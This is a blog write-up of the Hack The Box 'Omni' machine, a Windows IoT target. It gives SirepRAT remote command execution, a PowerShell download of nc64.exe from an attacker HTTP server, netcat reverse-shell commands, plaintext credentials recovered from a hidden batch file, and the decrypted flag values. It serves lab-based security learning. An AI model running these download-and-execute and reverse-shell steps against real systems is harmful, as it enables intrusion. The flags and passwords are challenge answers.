<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/">ctf/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/"><b>>htb/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/buff/">buff/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/feline/">feline/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/omni/"><b>>omni/</b></a>
				<ul>
				<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/omni/img/">img/</a></li>
				</ul>
			</li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/openkeys/">openkeys/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/sneaky_mailer/">sneaky mailer/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/time/">time/</a></li>
			</ul>
		</li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/">thm/</a></li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<h1>Box Information</h1>
<pre><code>Name:       | Omni
OS:         | Other
Difficulty: | Easy
Points:     | 20
Release:    | 22 Aug 2020
IP:         | 10.10.10.204
</code></pre>
<h1>Reconnaissance</h1>
<h2>Nmap scan</h2>
<pre><code>nmap -sC -sV -T4 -p- -oA scans/nmap.full 10.10.10.204
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 19:47 CEST
Nmap scan report for 10.10.10.204
Host is up (0.048s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=8/26%Time=5F46A0B4%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,&quot;\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12&quot;)%r(GenericLines,10,&quot;
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12&quot;)%r(Help,10,&quot;\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12&quot;)%r(JavaRMI,10,&quot;\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12&quot;);
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 182.72 seconds
</code></pre>
<ul>
<li>Not much so I need to do more enumeration!</li>
</ul>
<h2>http - 8080</h2>
<p>The page needs a username and a password.</p>
<p><img src="img/needcreds.png" alt="needcreds" /></p>
<blockquote><p>Windows Device Portal</p>
</blockquote>
<p>I searched for this text and I found out this is a <strong>Windows IOT</strong> Device.</p>
<p><img src="img/iot.png" alt="iot.png" /></p>
<h1>Exploitation</h1>
<p>I searched for <code>windows IOT RCE</code> in duckduckgo and I found an interesting github repo.</p>
<p><img src="img/winiotrce.png" alt="winiotrce" /></p>
<p><a href="https://github.com/SafeBreach-Labs/SirepRAT">https://github.com/SafeBreach-Labs/SirepRAT</a></p>
<p>I cloned the repository.</p>
<pre><code>git clone https://github.com/SafeBreach-Labs/SirepRAT
</code></pre>
<p>Usage(everything is in the readme btw):</p>
<pre><code>python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd &quot;C:\Windows\System32\cmd.exe&quot; --args &quot;/c &lt;command&gt;&quot; --v
</code></pre>
<h2>Transfering nc.exe to the target</h2>
<p>I can upload an nc.exe binary then use it in order to get an easy reverse shell.<br />
I downloaded <a href="https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip"><strong>netcat 1.11</strong></a> from <a href="https://eternallybored.org/misc/netcat/">https://eternallybored.org/misc/netcat/</a>.</p>
<p>I started a python3 http.server in this dir.</p>
<pre><code>sudo python3 -m http.server 80 --dir /opt/nc_win/netcat-1.11/
</code></pre>
<p>I used SirepRAT.py and powershell in order to download nc.exe to the box.</p>
<pre><code>python2 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd &quot;C:\Windows\System32\cmd.exe&quot; --args &quot;/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.168/nc64.exe&quot; --v
</code></pre>
<p><img src="img/nc_downloaded.png" alt="nc_downloaded" /></p>
<ul>
<li>I successfully downloaded nc64.exe to the box</li>
</ul>
<h2>Making a reverse shell connection</h2>
<p>I just executed nc64.exe in order to get a revshell while I was listening.</p>
<pre><code>python2 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd &quot;C:\Windows\System32\cmd.exe&quot; --args &quot;/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -e cmd.exe 10.10.14.168 1337&quot; --v
</code></pre>
<p><img src="img/got_revshell.png" alt="got_revshell" /></p>
<pre><code>$ ncx 1337
listening on [any] 1337 ...
connect to [10.10.14.168] from (UNKNOWN) [10.10.10.204] 49691
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32&gt;cd C:\
cd C:\

C:\&gt;dir
dir
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of C:\

07/20/2020  02:36 AM    &lt;DIR&gt;          $Reconfig$
08/26/2020  05:52 PM            45,272 burger.exe
10/26/2018  11:35 PM    &lt;JUNCTION&gt;     Data [\??\Volume{ac55f613-7018-45c7-b1e9-7ddda60262fd}\]
10/26/2018  11:37 PM    &lt;DIR&gt;          Program Files
10/26/2018  11:38 PM    &lt;DIR&gt;          PROGRAMS
10/26/2018  11:37 PM    &lt;DIR&gt;          SystemData
10/26/2018  11:37 PM    &lt;DIR&gt;          Users
07/03/2020  10:35 PM    &lt;DIR&gt;          Windows
               1 File(s)         45,272 bytes
               7 Dir(s)     577,171,456 bytes free

C:\&gt;
</code></pre>
<p>Since this is an IOT windows it has a lot of commands removed. For instance <code>whoami</code> does <strong>NOT</strong> work.</p>
<p><img src="img/whoamicmd.png" alt="whoamicmd" /></p>
<pre><code>C:\&gt;whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
</code></pre>
<p>But I can use powershell to get user information. So I started powershell.</p>
<pre><code>powershell.exe -ep bypass
</code></pre>
<p>Whoami powershell alternative:</p>
<pre><code>$env:UserName
</code></pre>
<p>Output:</p>
<pre><code>omni$
</code></pre>
<p><img src="img/psusername.png" alt="psusername" /></p>
<h1>Privilege Escalation</h1>
<h2>Manual Enumeration</h2>
<p>I listed the hard drive letters.</p>
<pre><code>wmic logicaldisk get name
</code></pre>
<p>Output:</p>
<pre><code>wmic logicaldisk get name
Name                          = C:
Name                          = D:
Name                          = U:
</code></pre>
<p><img src="img/dirveletters.png" alt="driveletters" /></p>
<p>I listed the files and direcories on each drive.</p>
<pre><code>C:\&gt;dir D:\
dir D:\
The device is not ready.
</code></pre>
<ul>
<li>D:\ does not work</li>
</ul>
<p>But the others are good. They are very similar but still different. U:\ could be a normal windows drive mounted and C:\ is the IOT windows drive.</p>
<pre><code>C:\&gt;dir U:\
dir U:\
 Volume in drive U is Data
 Volume Serial Number is 6A37-E09E

 Directory of U:\

10/26/2018  11:37 PM    &lt;DIR&gt;          CrashDump
07/04/2020  12:22 AM                 0 FirstBoot.Complete
10/26/2018  11:37 PM    &lt;DIR&gt;          Logfiles
10/26/2018  11:37 PM    &lt;DIR&gt;          Programs
07/03/2020  11:22 PM    &lt;DIR&gt;          SharedData
07/03/2020  11:22 PM    &lt;DIR&gt;          SystemData
10/26/2018  11:38 PM    &lt;DIR&gt;          test
07/04/2020  07:28 PM    &lt;DIR&gt;          Users
10/26/2018  11:38 PM    &lt;DIR&gt;          Windows
               1 File(s)              0 bytes
               8 Dir(s)   4,692,410,368 bytes free

C:\&gt;dir C:\
dir C:\
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of C:\

07/20/2020  02:36 AM    &lt;DIR&gt;          $Reconfig$
08/26/2020  05:52 PM            45,272 burger.exe
10/26/2018  11:35 PM    &lt;JUNCTION&gt;     Data [\??\Volume{ac55f613-7018-45c7-b1e9-7ddda60262fd}\]
10/26/2018  11:37 PM    &lt;DIR&gt;          Program Files
10/26/2018  11:38 PM    &lt;DIR&gt;          PROGRAMS
10/26/2018  11:37 PM    &lt;DIR&gt;          SystemData
10/26/2018  11:37 PM    &lt;DIR&gt;          Users
07/03/2020  10:35 PM    &lt;DIR&gt;          Windows
               1 File(s)         45,272 bytes
               7 Dir(s)     577,597,440 bytes free
</code></pre>
<p><img src="img/files_listed.png" alt="files_listed" /></p>
<h3>C:\</h3>
<p>I found an interesting bat file at <code>C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat</code>. The file is hidden so I need to use <code>dir -force</code>.</p>
<p><img src="img/dirforce.png" alt="dirforce" /></p>
<pre><code>PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement&gt; dir -force
dir -force


    Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/26/2018  11:37 PM                1.0.0.1
-a-h--        8/21/2020  12:56 PM            247 r.bat
</code></pre>
<p>I typed it out and found some creds!</p>
<p><img src="img/batfile_creds.png" alt="batfile_creds" /></p>
<pre><code>PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement&gt; type r.bat
type r.bat
@echo off

:LOOP

for /F &quot;skip=6&quot; %%i in ('net localgroup &quot;administrators&quot;') do net localgroup &quot;administrators&quot; %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT
</code></pre>
<pre><code>USERNAME        | PASSWORD
app             | mesh5143
administrator   | \_1nt3rn37ofTh1nGz
</code></pre>
<h3>U:\</h3>
<h4>Flags (encrypted)</h4>
<p>I found both flagfiles but they are in a weird format.</p>
<p><strong><em>user.txt:</em></strong></p>
<pre><code>type U:\Users\app\user.txt
</code></pre>
<p>Output:</p>
<pre><code>C:\&gt;type U:\Users\app\user.txt
type U:\Users\app\user.txt
&lt;Objs Version=&quot;1.1.0.1&quot; xmlns=&quot;http://schemas.microsoft.com/powershell/2004/04&quot;&gt;
  &lt;Obj RefId=&quot;0&quot;&gt;
    &lt;TN RefId=&quot;0&quot;&gt;
      &lt;T&gt;System.Management.Automation.PSCredential&lt;/T&gt;
      &lt;T&gt;System.Object&lt;/T&gt;
    &lt;/TN&gt;
    &lt;ToString&gt;System.Management.Automation.PSCredential&lt;/ToString&gt;
    &lt;Props&gt;
      &lt;S N=&quot;UserName&quot;&gt;flag&lt;/S&gt;
      &lt;SS N=&quot;Password&quot;&gt;01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc
57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b
4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990a
f0986d008a36c133c36f4da2f9406ae7&lt;/SS&gt;
    &lt;/Props&gt;
  &lt;/Obj&gt;
&lt;/Objs&gt;
</code></pre>
<p><strong><em>root.txt:</em></strong></p>
<pre><code>type U:\Users\administrator\root.txt
</code></pre>
<p>Output:</p>
<pre><code>C:\&gt;type U:\Users\administrator\root.txt
type U:\Users\administrator\root.txt
&lt;Objs Version=&quot;1.1.0.1&quot; xmlns=&quot;http://schemas.microsoft.com/powershell/2004/04&quot;&gt;
  &lt;Obj RefId=&quot;0&quot;&gt;
    &lt;TN RefId=&quot;0&quot;&gt;
      &lt;T&gt;System.Management.Automation.PSCredential&lt;/T&gt;
      &lt;T&gt;System.Object&lt;/T&gt;
    &lt;/TN&gt;
    &lt;ToString&gt;System.Management.Automation.PSCredential&lt;/ToString&gt;
    &lt;Props&gt;
      &lt;S N=&quot;UserName&quot;&gt;flag&lt;/S&gt;
      &lt;SS N=&quot;Password&quot;&gt;01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d
8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7&lt;/SS&gt;
    &lt;/Props&gt;
  &lt;/Obj&gt;
&lt;/Objs&gt;
</code></pre>
<ul>
<li>Same weird format</li>
<li>It's something with powershell</li>
<li>Powershell credential mentioned</li>
</ul>
<h2>Going back to port 8080</h2>
<p>I went back to http://10.10.10.204:8080 and logged in as administrator.</p>
<p><img src="img/gotuser_root.png" alt="gotuser_root" /></p>
<h3>Revshell as admin</h3>
<p>I can still use my nc64.exe in order to get a reverse shell as administrator.</p>
<p><img src="img/adminrevshell.png" alt="adminrevshell" /></p>
<pre><code>C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd.exe 10.10.14.168 1337
</code></pre>
<p><img src="img/got_shell_root.png" alt="got_shell_root" /></p>
<h2>Decrypting the flags</h2>
<p>https://www.jaapbrasser.com/quickly-and-securely-storing-your-credentials-powershell/
https://adamtheautomator.com/powershell-get-credential/</p>
<pre><code>$credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential.GetNetworkCredential().Password
</code></pre>
<p><img src="img/gotroothash.png" alt="gotroothash" /></p>
<pre><code>PS C:\windows\system32&gt; $credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential = Import-CliXml -Path U:\Users\administrator\root.txt

PS C:\windows\system32&gt; $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
</code></pre>
<p><img src="img/box_owned.png" alt="box_owned" /></p>
<pre><code>PS C:\windows\system32&gt; $env:ComputerName
$env:ComputerName
omni
PS C:\windows\system32&gt; $env:UserName
$env:UserName
Administrator
PS C:\windows\system32&gt;
</code></pre>
<ul>
<li>Note: I still dont have permission to the userflag because I'm not user <code>app</code> and I get an error</li>
</ul>
<p>So I need to log into the webapp at http://10.10.10.204:8080 as app and open a new revshell then do the same with the user.txt file.</p>
<p>Revshell comand:</p>
<pre><code>C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd.exe 10.10.14.168 1338
</code></pre>
<p>Decrypting the flag:</p>
<pre><code>$credential = Import-CliXml -Path U:\Users\app\user.txt
$credential.GetNetworkCredential().Password
</code></pre>
<p><img src="img/gotuserhash.png" alt="gotuserhash" /></p>
<pre><code>PS C:\windows\system32&gt; $credential = Import-CliXml -Path U:\Users\app\user.txt
$credential = Import-CliXml -Path U:\Users\app\user.txt
PS C:\windows\system32&gt; $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70
</code></pre>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
